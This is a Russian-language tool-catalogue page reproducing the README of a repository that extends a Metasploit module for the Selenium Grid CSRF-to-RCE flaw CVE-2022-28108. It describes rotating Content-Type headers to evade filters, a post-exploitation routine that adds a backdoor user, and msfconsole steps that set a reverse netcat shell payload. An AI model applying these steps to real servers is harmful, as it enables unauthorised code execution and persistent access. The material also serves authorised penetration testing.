Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2022-28108 | Kitploit
Инструменты/GitHubGitHub/zeroethical/cve-2022-28108
Фреймворки для эксплойтовАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийПост-эксплуатацияТестирование на ПроникновениеRed TeamingРазработка Полезной Нагрузки
GitHubzeroethical/cve-2022-28108

CVE-2022-28108

Репозиторий
1 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Selenium Chrome RCE эксплойт (расширенная версия)

Этот репозиторий содержит модифицированную версию модуля Metasploit, который эксплуатирует уязвимость удалённого выполнения кода (Remote Code Execution) в старых версиях Selenium Server (Grid).

Пожалуйста, внимательно прочитайте этот README перед использованием данного кода.


Благодарность авторам оригинального кода:

Этот модуль основан на отличной работе авторов оригинального модуля Metasploit для CVE-2022-28108. Основная функциональность эксплуатации уязвимости Selenium Server во многом основана на их реализации. Мы признаём и ценим их вклад в сообщество специалистов по безопасности.

  • Оригинальный модуль Metasploit: Вы можете найти оригинальный модуль в составе Metasploit Framework.
  • Оригинальные авторы: Оригинальные авторы указаны в самом модуле (обычно в разделе 'Author'). Пожалуйста, обратитесь к оригинальному модулю, чтобы узнать их имена.

Используемая уязвимость:

Этот модуль нацелен на CVE-2022-28108 — уязвимость межсайтовой подделки запроса (CSRF) в Selenium Server (Grid) версиях до 4.0.0-alpha-7. Уязвимость возникает из-за того, что сервер допускает не-JSON типы контента (такие как text/plain, application/x-www-form-urlencoded и multipart/form-data) для определённых запросов. Злоумышленник может использовать это для отправки вредоносных запросов, что приводит к удалённому выполнению кода (RCE) на сервере.

Как работает оригинальный код:

Оригинальный модуль Metasploit эксплуатирует эту уязвимость, отправляя специально сформированный POST-запрос к конечной точке /wd/hub/session уязвимого Selenium Server. Этот запрос использует не-JSON Content-Type (а именно text/plain) и содержит вредоносные конфигурации в goog:chromeOptions желаемых возможностей браузера. Это позволяет злоумышленнику указать произвольный бинарный файл (например, /usr/bin/python3) и аргументы, которые будут выполнены на сервере при создании новой сессии браузера.

Изменения и улучшения в этой версии:

Этот репозиторий содержит модифицированную версию оригинального модуля Metasploit. Основные изменения включают:

  • Обход Content-Type: Модифицированный модуль пытается эксплуатировать уязвимость, отправляя вредоносный запрос с несколькими различными заголовками Content-Type. Это включает text/plain, application/x-www-form-urlencoded и multipart/form-data. Это делается для потенциального обхода базовых механизмов фильтрации или обнаружения, которые могут искать конкретный Content-Type.
  • Функция execute_post_exploitation: Добавлена новая функция execute_post_exploitation(session_response). Эта функция вызывается после успешной эксплуатации и предназначена для выполнения базовых задач пост-эксплуатации. В текущей реализации она включает:
    • Попытку добавить в систему пользователя-бэкдор.
    • Сбор базовой информации о системе (имя пользователя, ID, версия ядра).
  • Функция execute_command_on_target: Добавлена ещё одна новая функция execute_command_on_target(command). Эта функция позволяет выполнять произвольные команды на целевой системе после успешного эксплойта. Она используется внутри функции execute_post_exploitation и может быть расширена для дальнейших действий пост-эксплуатации.

Ключевые различия:

Основное различие заключается в методе exploit и добавлении двух новых функций.

  • Оригинальный метод exploit: Был направлен на отправку одного запроса с Content-Type: text/plain.
  • Модифицированный метод exploit: Перебирает различные значения Content-Type, пытаясь эксплуатировать уязвимость с каждым из них. После успешной эксплуатации он вызывает функцию execute_post_exploitation.
  • Новые функции: Функции execute_post_exploitation и execute_command_on_target являются полностью новыми дополнениями этой модифицированной версии, обеспечивающими расширенные возможности пост-эксплуатации.

Как использовать модифицированный модуль:

  1. Убедитесь, что у вас установлен Metasploit Framework.
  2. Сохраните модифицированный код: Сохраните предоставленный Ruby-код в файл с расширением .rb (например, selenium_rce_extended.rb).
  3. Поместите модуль в каталог модулей Metasploit: Скопируйте сохранённый файл в соответствующий каталог модулей Metasploit. Обычно он находится по пути /usr/share/metasploit-framework/modules/exploits/ или ~/.msf4/modules/exploits/. Обратитесь к вашей установке Metasploit, чтобы узнать точное расположение.
  4. Запустите консоль Metasploit: Откройте терминал и выполните msfconsole.
  5. Загрузите модуль: В консоли Metasploit используйте команду use exploit/selenium_rce_extended (или путь, по которому вы сохранили файл, если вы поместили его в подкаталог).
  6. Настройте цель: Укажите IP-адрес и порт уязвимого Selenium Server:
    root@kitploit:~
    msf6 exploit(selenium_rce_extended) > set RHOSTS <target_ip>
    msf6 exploit(selenium_rce_extended) > set RPORT <target_port>
    
    (Порт по умолчанию для Selenium Grid обычно 4444).
  7. Установите полезную нагрузку: Выберите полезную нагрузку (payload) для выполнения в целевой системе. Например, для получения обратной оболочки (reverse shell):
    root@kitploit:~
    msf6 exploit(selenium_rce_extended) > set PAYLOAD cmd/unix/reverse_netcat
    msf6 exploit(selenium_rce_extended) > set LHOST <your_ip>
    msf6 exploit(selenium_rce_extended) > set LPORT <your_port>
    

Важные замечания (Дисклеймер):

  • Используйте этот код ответственно и этично. Этот модуль предоставлен в образовательных целях и для специалистов по безопасности, чтобы тестировать и оценивать безопасность своих систем.
  • Убедитесь, что у вас есть явное разрешение на тестирование целевой системы. Несанкционированное использование этого кода незаконно и неэтично.
  • Понимайте связанные риски. Эксплуатация уязвимостей может иметь непредвиденные последствия и может дестабилизировать целевые системы.
  • Проводите тестирование в изолированных и контролируемых средах. Всегда выполняйте тестирование в средах, где у вас есть полный контроль и где вы можете снизить потенциальный ущерб.
  • Функции пост-эксплуатации являются базовыми примерами. Возможно, вам потребуется изменить или расширить их в зависимости от ваших конкретных потребностей и целевой среды.

Отказ от ответственности:

Автор(ы) этого модифицированного кода не несут ответственности за любое неправомерное использование или ущерб, причинённый в результате использования данного модуля. Используя этот код, вы соглашаетесь нести полную ответственность за свои действия.

Лицензия:

Этот модифицированный код, вероятно, распространяется под той же лицензией, что и оригинальный Metasploit Framework (обычно это лицензия MSF). Подробности смотрите в лицензии оригинального Metasploit Framework.

Участие в разработке:

Приветствуются вклад и улучшения этого модуля. Не стесняйтесь отправлять pull request с исправлениями ошибок, улучшениями или новыми функциями.

Благодарности:

Мы ещё раз выражаем благодарность авторам оригинального модуля Metasploit для CVE-2022-28108. Их работа является основой этого модифицированного модуля.

Скачать инструмент
  • Запустите эксплойт: Выполните модуль командой exploit.